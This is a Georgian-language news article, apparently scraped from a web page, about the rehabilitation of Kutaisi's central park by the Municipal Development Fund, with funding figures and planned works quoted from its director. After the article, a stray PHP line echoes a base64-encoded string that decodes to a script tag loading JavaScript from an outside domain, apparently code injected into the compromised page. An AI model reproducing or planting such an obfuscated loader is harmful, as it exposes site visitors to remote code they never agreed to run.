celsiusi
ავერსი შნაიდერი
რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდი ქალაქ ქუთაისში მასშტაბური ინფრასტრუქტურული პროექტების განხორციელებას აგრძელებს.
 
პროგრამა ,,განახლებული რეგიონების” ფარგლებში, უკვე განახლდა ფალიაშვილის ქუჩაზე მდებარე 15 შენობა და დაიწყო ცენტრალური პარკის რეაბილიტაცია. პროექტის ფარგლებში, დამუშავდა პარკის რეაბილიტაციის საპროექტო დოკუმენტაცია. საპროექტო არეალი, დღეის მდგომარეობით, საკმაოდ არასახარბიელო მდგომარეობაშია. ამორტიზებულია საფეხმავლო ბილიკები, დაზიანებულია პარკის ფურნიტურა და განათების ბოძები, პრაქტიკულად არ არსებობს პარკის სარწყავი და სადრენაჟე სისტემა, რის გამოც წყალი კონკრეტულ მონაკვეთებში გროვდება და იწვევს არსებული ინფრასტრუქტურის, მათ შორის, ფილებისა თუ სხვა ელემენტების დაზიანებას.
 
,,მუნიციპალური განვითარების ფონდი ქუთაისში, ჯამში, 160 მილიონი ლარის ინვესტიციას ახორციელებს. ახლა ჩვენ ვიმყოფებით ქუთაისისთვის ერთ-ერთ მნიშვნელოვან ცენტრალურ პარკში, რომელიც წარმოადგენს ამ ქალაქის ისტორიას. პროექტის თავდაპირველი ეტაპი მოიცავდა არსებული მდგომარეობის სრულ შესწავლას. პარკის ტერიტორიაზე უკვე დასრულებულია არსებული უნიკალური ჯიშის ხე- მცენარეების შესწავლა, აღნუსხვა და სრული ტაქსაცია. პროექტი მომზადდა იმის მიხედვით, თუ რა მწვანე ნარგავები შეიძლება შეემატოს აღნიშნულ პარკს და არავითარ შემთხვევაში არ მოხდება მწვანე ნარგავების მოჭრა ან დაზიანება. რაც შეეხება პარკის გეგმარებას, რჩება უცვლელი და განახლდება მხოლოდ არსებული ინფრასტრუქტურა, სადაც გამოყენებული იქნება მიმდებარე ტერიტორიისთვის დამახასიათებელი არქიტექტურული ელემენტები. პარკის ცენტრალურ ნაწილში დაგეგმილია „გვირილობის მოედნის“ და პარკის ქვედა ნაწილში ახალი რეკრეაციული სივრცის ,,ვარდების ხეივნის“ მოეწყობა“ - განაცხადა მუნიციპალური განვითარების ფონდის აღმასრულებელმა დირექტორმა დავით ტაბიძემ.
პროექტის ფარგლებში, მოეწყობა სარწყავი და სადრენაჟე სისტემები და დენდროლოგიური პროექტის შესაბამისად, ტერიტორიას დაემატება ახალი ხე- მცენარეები. დამონტაჟდება ენერგოეფექტური განათების ბოძები, განახლდება არსებული შადრევნები, მოპირკეთდება სფეხმავლო ბილიკები. ასევე, დაგეგმილია არსებული საზოგადობრივი საპირფარეშოს რეაბილიტაცია და მედიათეკის განთავსება, რომელიც მოაზრებული იქნება ერთიან საპროექტო კონტექსტში, ერთმანეთისგან დამოუკიდებელი შესასვლელებით.
 
ცენტრალური პარკის რეაბილიტაციას საქართველოს მთავრობა 14.9 მილიონი ლარით აფინანსებს. პარკი 1821 წელს გაშენდა და ის გასული საუკუნის დასაწყისში არა მარტო სასეირნო, არამედ საზოგადო მოღვაწეების თავშეყრის ადგილიც იყო. პროექტის დეტალებს ადგილზე მუნიციპალური განვითარების ფონდის აღმასრულებელი დირექტორი დავით ტაბიძე არქიტექტორებთან, ინჟინრებთან, დენდროლოგებთან, ადგილობრვი ხელისუფლების და სამშენებლო კომპანიის წარმომადგენლებთან ერთად გაეცნო.
228
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");